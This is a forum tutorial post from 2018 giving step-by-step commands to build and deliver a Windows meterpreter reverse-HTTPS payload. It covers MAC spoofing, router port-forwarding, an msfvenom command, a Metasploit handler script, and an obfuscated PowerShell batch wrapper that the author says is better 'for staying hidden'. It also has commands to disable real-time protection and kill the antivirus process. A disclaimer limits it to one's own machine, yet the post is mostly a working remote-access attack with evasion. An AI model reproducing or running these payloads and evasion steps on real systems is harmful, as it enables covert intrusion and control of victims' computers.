Learn About Computers

Teaching about Computers


    27. Wlan Payload Creation, Router Settings, Open Listener, & Hacking Test

    Share

    Aof
    Admin

    Posts : 95
    Join date : 2018-03-24

    27. Wlan Payload Creation, Router Settings, Open Listener, & Hacking Test

    Post by Aof on Wed May 30, 2018 2:42 am


    *I do not Condone Hacking into other People's Pcs, so please only use this tutorial to "hack" your own machine.*
    27. Wlan Payload Creation, Router Settings, Open Listener, & Hacking Test
    ----
    wlan, Wide Local Area Network Payload creation

    PHASE 1 Spoofing the Linux Identity, setting up the routers, creating the Payload, starting the Listener.
    1. service network-manager stop = Stops the network interfaces in the Linux Machine, and makes them changeable.
    2. nano /etc/hosts = change the Hostname
    3. nano /etc/hostname = change the Hostname
    4. macchanger -r eth0 = assigns our wired connection eth0 interface a random mac address.
    Open mlist, choose a manufacturer to spoof the mac address with.
    5. macchanger -m 00:00:00:00:00:00 eth0 = choose a manufacturer with the first 6 digits, and use the random mac address for the last 6 digits.
    6. macchanger -m 00:00:00:00:00:00 lo = spoof lo interface using the same chosen mac address spoof.
    7. macchanger -m 00:00:00:00:00:00 wlan0 = spoof wlan0 interface if it exists, using the same chosen mac address spoof.
    8. service network-manager start = starts the network-manager again, if wlan0 did exist, and we were using wifi we would have to bring it down with ifconfig wlan0 and change it again, because the wireless interfaces likes being a little more difficult than the wired connections.
    9. macchanger -s eth0 = shows the eth0 interface mac address.
    10. macchanger -s lo = shows the lo interface mac address.
    11. ifconfig = views all of the internet interfaces that's up.
    12. copy your inet address, which is the local ip of the linux machine.
    13. Change the last digit to 1, to access the 2ndary Trendnet Router Page. (unless you have altered your dhcp settings previously, if you have, then you must remember what you've set it to, 2 maybe?
    14. login to router page, go to advanced, DMZ, place the local ip to your Linux Machine as the DMZ.
    Now, go to status, "ip address" is the 2ndary router's ip that the 1st router assigned it, take note of that.
    go to Gateway, to get to the 1st Router Page by using the gateway ip, under Port Triggering of the 1st router page, you'll want to Port Trigger "443" to your 1st Router's Public Ip.
    and Port Forward Port "443" to the Virtual Server through 1st router to your 2nd router's Ip Address, which is the Ip Address that your first router assigned your 2ndary Trendnet Router.

    Copy the "Public Ip" of the 1st Router, you'll need it to create the Payload.
    15. service network-manager stop = After you make changes to the Router page, shut down and open back up your interfaces.
    16. service network-manager start = of course if you were using wireless internet, you'd have to do the ifconfig wlan0 down again and re-change your wireless as well.
    This is the equivalant to ipconfig /release, ipconfig /renew in a Windows Pc.
    17. ping duckduckgo.com = You can ping duckduckgo to see if you're online again, then do another macchanger -s on all of your up interfaces to check to see if the mac address is still spoofed or not.
    18. msfvenom -p windows/meterpreter/reverse_https LHOST=0.0.0.0 LPORT=443 -f psh-cmd -o ~/Desktop/f/thefile.bat = set the LHOST to the Public Ip of your first Router, set LPORT to 443, 443 is a default protocol used by machines to access their browsers, look up stuff, it's very commonly opened.
    19. plug in usb stick, copy thefile.bat the payload file to the USB stick, then unmount the Usb stick so that it will run okay on Windows 7 and not be currupted when we bring it there.
    20. cd ~/Desktop/rc = Navigate to the pre-created rc Desktop folder,
    Below is the script of file.rc
    =*=
    Code:
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_https
    set LHOST 0.0.0.0
    set LPORT 443
    set ReverseListenerBindAddress 0.0.0.0
    set ExitonSessions false
    exploit -j -z
    1st line, chooses a handler to use.
    2nd line, sets the Payload to use.
    3rd line, LHOST The Public Ip of the 1st Router should go here.
    4rth line, LPORT The Port 443 should go here.
    5th line, The Local Ip of your Linux Machine should go here, it will call your local machine after the connection is made by the Public Ip.
    6th line, sets the ExitonSessions to false.
    7th line, tells msfconsole to connect to new connections, then place them in the "background"
    leaving it connected until you're ready to proceed,
    still while looking for other connections that may happen
    (if you are listening for multiple pc connections for example,
    or want to look at a connection to make sure
    it's the right one before connecting to it and navigating.)

    21. msfconsole -r file.rc = During our Lan (local area network) Pentest earlier, we typed msfconsole then entered the commands manually for a learning experience, we could've just created a rc file. Now that you know your way around a bit. You can use the -r and just run msfconsole from your file.rc to automate the setup of the listener.
    22. Notice how when the listener has been started, it says,
    started HTTPS reverse handler on https://1.2.3.4 (if 1.2.3.4:443 is the ip of your local machine.)
    That means it's connected to your local linux ip address, using the port 443.
    23. https://www.yougetsignal.com/tools/open-ports/ = Type Public Ip of 1st Router, and check to see if Port 443 is open or not.
    If the Port says open, it's ready to make the connection, The Target Pc just needs to click the payload to call the Linux Pc that's listening for it.

    PHASE TWO: Transferring Payload to fi.bat test file
    24. On a Windows 7 Pc search windows for Microsoft, go into settings, turn off real-time protection.
    25. taskkill /im explorer.exe /f & taskkill /im msseces.exe /f & explorer.exe = kills the explorer.exe process, which is windows file explorer, kills the virus scanner process, brings the explorer back up.
    26. After it's dead, plug in the usb stick right click on the fi file edit with notepad.exe (make sure wordwrap is off as we did while editing .bat files in the previous tutorials, highlight the insert here portion that is inside of the (') punctuations.
    Copy and paste the Payload Powershell command into the Insert here portion of the file.

    Contents of fi.bat file
    =*=
    Code:
    @echo off & powershell -w 1 -C "sv x -;sv ZO ec;sv h ((gv x).value.toString()+(gv ZO).value.toString());powershell (gv h).value.toString() 'INSERT-HERE'" > nul
    exit

    27. If you are curious why I decide to alter the file, in 2016 the file was generated differently, and with a more concealed command, this method is a lot better for staying hidden.

    The same method is also used in the 3 bat files that were used earlier in the LAN Pentest.
    28. Now double clicking the "fi.bat" and going back to the Linux Pc for a test to see if it works or not.
    29. Sometimes the port 443 closes by itself on the public ip address, if this happens you can perform the following,
    30. service network-manager stop = brings down your interfaces
    31. service network-manager start = starts the interfaces again, of course keep in mind that if you're using wifi you'll need to perform the extra "ifconfig wlan0 down" step to change the wireless mac address because the wireless is more difficult to change.
    32. ping duckduckgo.com = checks to see if you're online.
    33. macchanger -s eth0 = checks wired connection mac address
    34. macchanger -s lo = checks the lo interface mac address
    35. if it's still closed, visit your 1st and 2nd router page again, double check the ports.
    Sometimes the routers randomly closes your ports for a couple of seconds or minutes, or maybe the ports just get busy and the connection isn't able to be made right then.
    36. Now the public ip port shows as open with yougetsignal.com so it will accept connections and transfer them to the Linux Local Ip Address.
    37. In the listener handler that was left open, it now made the connection.
    38. sessions -i = may be required to view if there are any active connections in the Listener.
    39. sessions -i 1 = sessions -i followed by an ID number will connect to the session, always make sure to view the information of the connection before you connect to it,
    You'll want to make sure that it's your pc that is trying to connect to your listener before you connect to it. If it fails to load information, just wait a few seconds and try "sessions i" again. We certainly wouldn't want to "hack" someone else or a spider security robot that is going around the web looking for connections that will connect to it. Since that would be Illegal.
    Now You have a successful Meterpreter session.
    40. pwd = shows the user you're connected to present working directory from where your powershell connection has been established, in this case the file was clicked from the user's desktop so it's showing that as the present working directory.
    41. help = another thing that should be noted is that after you have made a successful interaction with a computer you can type help to view the meterpreter help page, which is filled with useful information to use with the Meterpreter.
    42. background = backgrounds a Meterpreter session, and leaves the option to reconnect to it open.
    The Test was successful.



      Current date/time is Sun Dec 16, 2018 9:25 pm